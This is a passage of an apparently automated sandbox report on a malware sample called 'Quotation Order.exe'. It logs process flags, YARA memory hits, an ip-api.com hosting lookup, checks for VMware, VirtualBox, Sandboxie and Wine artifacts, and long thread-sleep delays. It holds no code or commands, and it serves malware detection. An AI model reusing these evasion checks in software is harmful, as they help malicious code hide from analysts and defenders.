                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara match	File source: Process Memory Space: Quotation Order.exe PID: 7384, type: MEMORYSTR
                    Source: Yara match	File source: Process Memory Space: svchost.exe PID: 8072, type: MEMORYSTR
                    Source: Yara match	File source: Process Memory Space: svchost.exe PID: 8164, type: MEMORYSTR
                    Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7412, type: MEMORYSTR
                    Source: Yara match	File source: Process Memory Space: svchost.exe PID: 6284, type: MEMORYSTR
                    Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1	Host: ip-api.com	Connection: Keep-Alive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\Quotation Order.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Roaming\svchost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Windows\System32\svchost.exe	System information queried: FirmwareTableInformation
                    Source: Quotation Order.exe, 00000000.00000002.1287260691.0000025980041000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.1482838005.00000153C09BE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.1454297088.000001FC8F1F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.1488978955.0000026BB4FDE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.1652420227.000002DFB9BBE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
                    Source: Quotation Order.exe, 00000000.00000002.1287260691.0000025980041000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.1482838005.00000153C09BE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.1454297088.000001FC8F1F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.1465404864.000001FC9F1C1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1472724735.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AddInProcess32.exe, 0000001A.00000002.1487009646.0000000002BD1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001F.00000002.1627243849.0000000002D44000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.1488978955.0000026BB4FDE000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000002B.00000002.2520439287.0000000002F52000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.1652420227.000002DFB9BBE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
                    Source: Quotation Order.exe, 00000000.00000002.1287260691.0000025980041000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.1482838005.00000153C05A1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.1454297088.000001FC8F1F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.1488978955.0000026BB4BCE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.1652420227.000002DFB97A1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLLP
                    Source: Quotation Order.exe, 00000000.00000002.1287260691.0000025980041000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.1482838005.00000153C05A1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.1454297088.000001FC8F1F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000026.00000002.1488978955.0000026BB4BCE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.1652420227.000002DFB97A1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAMEP
                    Source: C:\Users\user\Desktop\Quotation Order.exe Memory allocated: 259E9C40000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Quotation Order.exe Memory allocated: 259EB650000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Memory allocated: 153BEAF0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Memory allocated: 153D85A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Memory allocated: 1FC8F1B0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Memory allocated: 1FCA71B0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 11E0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 2BA0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 4BA0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: CC0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: 2D10000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: 27E0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Memory allocated: 26BB4BC0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Memory allocated: 26BCCBC0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 12B0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 2F20000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Memory allocated: 2C50000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe Memory allocated: 1670000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe Memory allocated: 31A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe Memory allocated: 2FE0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Memory allocated: 2DFB7D20000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Memory allocated: 2DFD17A0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: 1440000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: 3250000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: 2D10000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier
                    Source: C:\Users\user\AppData\Roaming\svchost.exe File opened / queried: C:\WINDOWS\system32\drivers\vmmouse.sys
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\disk\Enum name: 0
                    Source: C:\Users\user\AppData\Roaming\svchost.exe File opened / queried: C:\WINDOWS\system32\drivers\vmhgfs.sys
                    Source: C:\Windows\System32\svchost.exe File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: C:\Users\user\AppData\Roaming\svchost.exe File opened / queried: C:\WINDOWS\system32\drivers\VBoxMouse.sys
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                    Source: C:\Users\user\Desktop\Quotation Order.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6803
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2751
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8597
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 794
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Window / User API: threadDelayed 1269
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Window / User API: threadDelayed 2907
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window / User API: threadDelayed 4527
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window / User API: threadDelayed 936
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7118
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Window / User API: threadDelayed 2388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Window / User API: threadDelayed 2139
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4722
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2400
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window / User API: threadDelayed 2134
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window / User API: threadDelayed 2482
                    Source: C:\Users\user\Desktop\Quotation Order.exe TID: 7476 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7996 Thread sleep time: -5534023222112862s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8088 Thread sleep time: -6456360425798339s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8020 Thread sleep time: -14757395258967632s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8020 Thread sleep time: -100000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7940 Thread sleep count: 1269 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8020 Thread sleep time: -99891s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7940 Thread sleep count: 2907 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8020 Thread sleep time: -99766s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8020 Thread sleep time: -99651s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8020 Thread sleep time: -99531s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8020 Thread sleep time: -99422s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8020 Thread sleep time: -99141s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8020 Thread sleep time: -99031s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8020 Thread sleep time: -98916s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8020 Thread sleep time: -96602s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8020 Thread sleep time: -96485s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8020 Thread sleep time: -96326s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8020 Thread sleep time: -96157s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8020 Thread sleep time: -96000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8020 Thread sleep time: -95891s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8020 Thread sleep time: -95767s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8020 Thread sleep time: -95649s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8020 Thread sleep time: -95531s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8020 Thread sleep time: -95418s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8020 Thread sleep time: -95297s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8020 Thread sleep time: -95188s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888 Thread sleep time: -21213755684765971s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888 Thread sleep time: -100000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4656 Thread sleep count: 4527 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888 Thread sleep time: -99890s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888 Thread sleep time: -99781s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888 Thread sleep time: -99671s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888 Thread sleep time: -99563s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888 Thread sleep time: -99453s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888 Thread sleep time: -99343s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888 Thread sleep time: -99234s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888 Thread sleep time: -99123s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888 Thread sleep time: -98997s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888 Thread sleep time: -98891s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888 Thread sleep time: -98766s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888 Thread sleep time: -98651s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888 Thread sleep time: -98547s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888 Thread sleep time: -98438s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4656 Thread sleep count: 936 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888 Thread sleep time: -98317s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888 Thread sleep time: -98188s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888 Thread sleep time: -98078s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888 Thread sleep time: -97953s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888 Thread sleep time: -97844s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888 Thread sleep time: -97735s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888 Thread sleep time: -97625s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888 Thread sleep time: -97515s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888 Thread sleep time: -97405s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888 Thread sleep time: -97296s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888 Thread sleep time: -97188s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 7888 Thread sleep time: -97076s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2596 Thread sleep time: -4611686018427385s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2092 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988 Thread sleep time: -13835058055282155s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988 Thread sleep time: -100000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 4232 Thread sleep count: 2388 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988 Thread sleep time: -99868s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988 Thread sleep time: -99730s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988 Thread sleep time: -99610s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 4232 Thread sleep count: 2139 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988 Thread sleep time: -99485s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988 Thread sleep time: -99359s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988 Thread sleep time: -99244s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988 Thread sleep time: -99137s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988 Thread sleep time: -99017s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2988 Thread sleep time: -98891s >= -30000s
